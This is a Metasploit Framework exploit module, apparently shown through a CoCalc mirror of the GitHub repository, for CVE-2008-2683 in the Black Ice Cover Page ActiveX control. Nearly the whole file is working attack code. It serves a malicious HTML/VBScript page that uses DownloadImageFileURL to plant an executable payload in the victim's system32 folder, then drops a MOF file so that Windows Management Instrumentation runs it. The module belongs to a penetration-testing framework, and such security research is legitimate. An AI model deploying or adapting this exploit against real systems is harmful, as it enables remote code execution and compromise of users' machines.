Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::WbemExec

12


13
  # include Msf::Exploit::Remote::BrowserAutopwn

14
  # autopwn_info({

15
  #  :os_name => OperatingSystems::Match::WINDOWS,

16
  #  :ua_name    => HttpClients::IE,

17
  #  :javascript => true,

18
  #  :rank       => NormalRanking,

19
  #  :classid    => "{79956462-F148-497F-B247-DF35A095F80B}",

20
  #  :method     => "DownloadImageFileURL",

21
  # })

22


23
  def initialize(info = {})

24
    super(

25
      update_info(

26
        info,

27
        'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',

28
        'Description' => %q{

29
          This module allows remote attackers to place arbitrary files on a users file system

30
          by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX

31
          Control (BIImgFrm.ocx 12.0.0.0).  Code execution can be achieved by first uploading the

32
          payload to the remote machine, and then upload another mof file, which enables Windows

33
          Management Instrumentation service to execute the binary. Please note that this module

34
          currently only works for Windows before Vista.  Also, a similar issue is reported in

35
          BIDIB.ocx (10.9.3.0) within the Barcode SDK.

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => [

39
          'shinnai', # original discovery

40
          'mr_me <steventhomasseeley[at]gmail.com>', # msf

41
          'sinn3r' # wbemexec tekniq

42
        ],

43
        'References' => [

44
          [ 'CVE', '2008-2683'],

45
          [ 'OSVDB', '46007'],

46
          [ 'BID', '29577'],

47
          [ 'EDB', '5750' ],

48
        ],

49
        'DefaultOptions' => {

50
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

51
        },

52
        'Payload' => {

53
          'Space' => 2048,

54
          'StackAdjustment' => -3500,

55
        },

56
        'Platform' => 'win',

57
        'Targets' => [

58
          # Windows before Vista

59
          [ 'Automatic', {} ],

60
        ],

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '2008-06-05',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70
  end

71


72
  def autofilter

73
    false

74
  end

75


76
  def check_dependencies

77
    use_zlib

78
  end

79


80
  def on_request_uri(cli, request)

81
    if request.uri.match(/\.EXE/)

82
      print_status("Sending EXE payload...")

83
      send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })

84
      return

85
    elsif request.uri.match(/\.MOF/)

86
      return if @mof_name == nil or @payload_name == nil

87


88
      print_status("Generating mof")

89
      mof = generate_mof(@mof_name, @payload_name)

90
      print_status("Sending MOF")

91
      send_response(cli, mof, { 'Content-Type' => 'application/octet-stream' })

92
      return

93
    end

94


95
    url = "http://"

96
    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

97
    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

98


99
    # VBScript variables

100
    clsid = "79956462-F148-497F-B247-DF35A095F80B"

101
    method = "DownloadImageFileURL"

102
    blackice = rand_text_alpha(rand(100) + 1) # BlackIce object ID

103
    @payload_name = rand_text_alpha(rand(10) + 1) + ".EXE" # Payload name

104
    payload_vbs_url_name = rand_text_alpha(5) # Payload's vbs var name

105
    payload_vbs_lpath = rand_text_alpha(6) # Payload's lpath var name

106
    @mof_name = rand_text_alpha(rand(10) + 1) + ".MOF" # MOF path on victim machine

107
    mof_vbs_url_name = rand_text_alpha(5) # MOF's vbs var name

108
    mof_vbs_lpath = rand_text_alpha(6) # MOF's lpath var name

109
    sub_name = rand_text_alpha(rand(10) + 1) # Subroutine name

110


111
    # Slow connection friendly: We will wait for 4 seconds before we try to execute our payload

112
    # This delay seems necessary before calling mof, otherwise we end up interrupting downloading

113
    # our payload

114
    content = <<-EOS

115
    <html>

116
    <object classid='clsid:#{clsid}' id='#{blackice}' ></object>

117
    <script language='vbscript'>

118
    sub #{sub_name}

119
    #{mof_vbs_url_name} = "#{url}#{@mof_name}"

120
    #{mof_vbs_lpath} = "C:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}"

121
    #{blackice}.#{method} #{mof_vbs_url_name}, #{mof_vbs_lpath}

122
    end sub

123


124
    #{payload_vbs_url_name} = "#{url}#{@payload_name}"

125
    #{payload_vbs_lpath} = "C:\\WINDOWS\\system32\\#{@payload_name}"

126
    #{blackice}.#{method} #{payload_vbs_url_name}, #{payload_vbs_lpath}

127
    setTimeout "#{sub_name}()", 4000

128
    </script>

129
    </html>

130
    EOS

131


132
    # Clear the extra tabs

133
    content = content.gsub(/^ {4}/, '')

134


135
    print_status("Sending exploit HTML")

136
    send_response_html(cli, content)

137
    handler(cli)

138
  end

139


140
  def exploit

141
    @payload = generate_payload_exe

142
    super

143
  end

144
end

145


146